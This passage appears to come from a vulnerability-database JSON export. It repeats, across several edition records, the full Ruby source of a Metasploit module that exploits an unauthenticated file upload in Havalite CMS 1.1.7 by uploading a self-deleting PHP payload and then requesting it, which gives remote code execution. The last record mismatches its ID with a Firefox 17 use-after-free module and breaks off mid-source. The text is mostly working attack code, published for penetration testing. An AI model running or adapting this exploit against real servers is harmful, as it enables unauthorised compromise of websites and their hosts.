Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-23T09:55:56", "differentElements": ["modified", "published"], "edition": 103}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "256696488d2935c452aa3214d8109c9b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly 
prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-09-29T17:50:07", "history": [], "viewCount": 9, "enchantments": {"score": {"value": 0.7, "vector": "NONE", "modified": "2019-09-29T17:50:07"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:6630845352841826230", "KITPLOIT:730987502722793008"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:2212-1", "OPENSUSE-SU-2019:2213-1", "OPENSUSE-SU-2019:2207-1", "OPENSUSE-SU-2019:2208-1", "OPENSUSE-SU-2019:2205-1", "OPENSUSE-SU-2019:2204-1", "OPENSUSE-SU-2019:2211-1", "OPENSUSE-SU-2019:2206-1"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1937-1:B255A", "DEBIAN:DSA-4537-1:645C5", "DEBIAN:DLA-1934-1:D1937", "DEBIAN:DLA-1935-1:31587", "DEBIAN:DLA-1936-1:CB642", "DEBIAN:DSA-4536-1:AA824", "DEBIAN:DSA-4535-1:DB4A4", "DEBIAN:DSA-4534-1:49373"]}, {"type": "freebsd", "idList": ["E917CABA-E291-11E9-89F1-152FED202BB7"]}, {"type": "ubuntu", "idList": ["USN-4141-1"]}], "modified": "2019-09-29T17:50:07"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-29T17:50:07", "differentElements": ["modified", "published"], "edition": 104}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "30559bcc32809ca21a6af9e4866fb960", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly 
prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-09-30T00:33:50", "history": [], "viewCount": 9, "enchantments": {"score": {"value": 0.7, "vector": "NONE", "modified": "2019-09-30T00:33:50"}, "dependencies": {"references": [{"type": "debian", "idList": ["DEBIAN:DSA-4538-1:D6CC7", "DEBIAN:DLA-1937-1:B255A", "DEBIAN:DSA-4537-1:645C5", "DEBIAN:DLA-1934-1:D1937", "DEBIAN:DLA-1935-1:31587", "DEBIAN:DLA-1936-1:CB642", "DEBIAN:DSA-4536-1:AA824", "DEBIAN:DSA-4535-1:DB4A4"]}, {"type": "kitploit", "idList": ["KITPLOIT:6630845352841826230", "KITPLOIT:730987502722793008"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:2212-1", "OPENSUSE-SU-2019:2213-1", "OPENSUSE-SU-2019:2207-1", "OPENSUSE-SU-2019:2208-1", "OPENSUSE-SU-2019:2205-1", "OPENSUSE-SU-2019:2204-1", "OPENSUSE-SU-2019:2211-1", "OPENSUSE-SU-2019:2206-1"]}, {"type": "freebsd", "idList": ["E917CABA-E291-11E9-89F1-152FED202BB7"]}, {"type": "ubuntu", "idList": ["USN-4141-1"]}], "modified": "2019-09-30T00:33:50"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-30T00:33:50", "differentElements": ["modified", "published"], "edition": 105}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "256696488d2935c452aa3214d8109c9b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly 
prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-10-08T09:40:31", "history": [], "viewCount": 9, "enchantments": {"score": {"value": 2.5, "vector": "NONE", "modified": "2019-10-08T09:40:31"}, "dependencies": {"references": [{"type": "suse", "idList": ["OPENSUSE-SU-2019:2292-1", "OPENSUSE-SU-2019:2286-1", "OPENSUSE-SU-2019:2288-1", "OPENSUSE-SU-2019:2280-1", "OPENSUSE-SU-2019:2281-1", "OPENSUSE-SU-2019:2279-1", "OPENSUSE-SU-2019:2278-1", "OPENSUSE-SU-2019:2282-1", "OPENSUSE-SU-2019:2283-1", "OPENSUSE-SU-2019:2276-1"]}, {"type": "redhat", "idList": ["RHSA-2019:2974", "RHSA-2019:2973"]}, {"type": "kitploit", "idList": ["KITPLOIT:4019975092566820832"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4539-2:0772C", "DEBIAN:DLA-1948-1:E0D76", "DEBIAN:DLA-1942-2:93F4A"]}, {"type": "ubuntu", "idList": ["USN-4148-1"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891947"]}], "modified": "2019-10-08T09:40:31"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-08T09:40:31", "differentElements": ["modified", "published"], "edition": 106}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "30559bcc32809ca21a6af9e4866fb960", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly 
prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-10-08T12:23:38", "history": [], "viewCount": 9, "enchantments": {"score": {"value": 0.9, "vector": "NONE", "modified": "2019-10-08T12:23:38"}, "dependencies": {"references": [{"type": "redhat", "idList": ["RHSA-2019:2980", "RHSA-2019:2978", "RHSA-2019:2977", "RHSA-2019:2974", "RHSA-2019:2973"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:2292-1", "OPENSUSE-SU-2019:2286-1", "OPENSUSE-SU-2019:2288-1", "OPENSUSE-SU-2019:2280-1", "OPENSUSE-SU-2019:2281-1", "OPENSUSE-SU-2019:2279-1", "OPENSUSE-SU-2019:2278-1", "OPENSUSE-SU-2019:2282-1", "OPENSUSE-SU-2019:2283-1", "OPENSUSE-SU-2019:2276-1"]}, {"type": "kitploit", "idList": ["KITPLOIT:4019975092566820832"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4539-2:0772C", "DEBIAN:DLA-1948-1:E0D76", "DEBIAN:DLA-1942-2:93F4A"]}], "modified": "2019-10-08T12:23:38"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-08T12:23:38", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 107}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "ac07f3d729228116f15db7ea8451686e", "type": "metasploit", "bulletinFamily": "exploit", "title": "Firefox onreadystatechange Event DocumentViewerImpl Use After Free", 
"description": "This module exploits a vulnerability found on Firefox 17.0.6, specifically a use after free of a DocumentViewerImpl object, triggered via a specially crafted web page using onreadystatechange events and the window.stop() API, as exploited in the wild on 2013 August to target Tor Browser users.\n", "published": "2013-08-07T20:36:54", "modified": "2017-09-09T02:19:55", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1690", "https://www.mozilla.org/security/announce/2013/mfsa2013-53.html", "https://lists.torproject.org/pipermail/tor-announce/2013-August/000089.html", "https://bugzilla.mozilla.org/show_bug.cgi?id=901365", "http://krash.in/ffn0day.txt", "http://hg.mozilla.org/releases/mozilla-esr17/rev/2d5a85d7d3ae"], "cvelist": ["CVE-2013-1690"], "lastseen": "2019-10-08T13:41:47", "history": [], "viewCount": 9, "enchantments": {"score": {"value": 7.4, "vector": "NONE", "modified": "2019-10-08T13:41:47"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1690"]}, {"type": "saint", "idList": ["SAINT:777991960CE017DA619939903D62924F", "SAINT:3A0ADAAFFAFD468DC437DB98F455F7D0", "SAINT:14E92DF0A7C5748213D702F14670E0F6"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/BROWSER/MOZILLA_FIREFOX_ONREADYSTATECHANGE"]}, {"type": "mozilla", "idList": ["MFSA2013-53"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:122750"]}, {"type": "seebug", "idList": ["SSV:60948"]}, {"type": "exploitdb", "idList": ["EDB-ID:27429"]}, {"type": "zdt", "idList": ["1337DAY-ID-21082"]}, {"type": "threatpost", "idList": ["THREATPOST:0AFCC83E8C58D8FF486D59E8F7E64FBB"]}, {"type": "suse", "idList": ["SUSE-SU-2013:1153-1", "OPENSUSE-SU-2013:1143-1", "OPENSUSE-SU-2013:1141-1", "OPENSUSE-SU-2013:1140-1", "OPENSUSE-SU-2013:1142-1"]}, {"type": "nessus", "idList": ["SUSE_FIREFOX-20130628-8636.NASL", "SUSE_11_FIREFOX-20130628-130628.NASL", 
"SL_20130625_THUNDERBIRD_ON_SL5_X.NASL", "REDHAT-RHSA-2013-0982.NASL", "OPENSUSE-2013-555.NASL", "CENTOS_RHSA-2013-0982.NASL", "SL_20130625_FIREFOX_ON_SL5_X.NASL", "OPENSUSE-2013-554.NASL", "ORACLELINUX_ELSA-2013-0981.NASL", "REDHAT-RHSA-2013-0981.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:903221", "OPENVAS:903215", "OPENVAS:1361412562310881753", "OPENVAS:881753", "OPENVAS:1361412562310881755", "OPENVAS:1361412562310903215", "OPENVAS:1361412562310903217", "OPENVAS:1361412562310850496", "OPENVAS:871012", "OPENVAS:1361412562310123605"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2716-1:03728", "DEBIAN:DSA-2720-1:1CEA2"]}, {"type": "oraclelinux", "idList": ["ELSA-2013-0981", "ELSA-2013-0982"]}, {"type": "redhat", "idList": ["RHSA-2013:0981", "RHSA-2013:0982"]}, {"type": "ubuntu", "idList": ["USN-1891-1", "USN-1890-1"]}, {"type": "centos", "idList": ["CESA-2013:0982", "CESA-2013:0981"]}, {"type": "freebsd", "idList": ["B3FCB387-DE4B-11E2-B1C6-0025905A4771"]}], "modified": "2019-10-08T13:41:47"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/mozilla_firefox_onreadystatechange.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Firefox onreadystatechange Event DocumentViewerImpl Use After Free',\n 'Description' => %q{\n This module exploits a vulnerability found on Firefox 17.0.6, specifically a use\n after free of a DocumentViewerImpl object, triggered via a specially crafted web\n page using onreadystatechange events and the window.stop() API, as exploited in the\n wild on 2013 August to target Tor Browser users.\n },\n 'License' => MSF_LICENSE,\n 
